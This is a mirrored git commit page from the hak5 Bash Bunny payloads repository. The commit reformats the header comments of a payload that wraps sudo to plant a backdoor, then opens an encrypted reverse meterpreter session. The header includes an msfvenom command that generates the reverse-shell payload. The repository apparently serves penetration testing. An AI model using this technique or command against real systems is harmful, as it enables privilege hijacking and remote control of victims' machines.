mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Cleanup: bushingsBlueTurtle: Update Payload Header
This commit is contained in:
parent
39b0d2887a
commit
67527e8ce0
@ -4,27 +4,24 @@
|
||||
# Author: Michael Weinstein
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
# Description: Create a wrapper for sudo sessions that will live inside ~/.config/sudo and be added
|
||||
# to the $PATH. After completing the sudo task for the user, it will attempt an encrypted
|
||||
# reverse meterpreter session. The msfvenom payload should be in this same directory as
|
||||
# shell.py Run the following command to generate a payload, remember to input the appropriate
|
||||
# IP and port
|
||||
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
|
||||
#
|
||||
# Create a wrapper for sudo sessions that
|
||||
# will live inside ~/.config/sudo and be added
|
||||
# to the $PATH. After completing the sudo task
|
||||
# for the user, it will attempt an encrypted reverse
|
||||
# meterpreter session. The msfvenom payload
|
||||
# should be in this same directory as shell.py
|
||||
# Run the following command to generate a payload,
|
||||
# remember to input the appropriate IP and port
|
||||
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
|
||||
# This payload was inspired greatly by SudoBackdoor
|
||||
# and much of the code here was derived (or copied
|
||||
# wholesale) from that with great thanks to oXis.
|
||||
#
|
||||
# This payload was inspired greatly by SudoBackdoor
|
||||
# and much of the code here was derived (or copied
|
||||
# wholesale) from that with great thanks to oXis.
|
||||
# This one's for Bushing. Probably should have written it in Perl.
|
||||
#
|
||||
# This one's for Bushing. Probably should have written it in Perl.
|
||||
#
|
||||
# White | Ready
|
||||
# Amber blinking | Waiting for server
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
# LEDS:
|
||||
# White: Ready
|
||||
# Amber Blink: Waiting for server
|
||||
# Blue Blink: Attacking
|
||||
# Green: Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user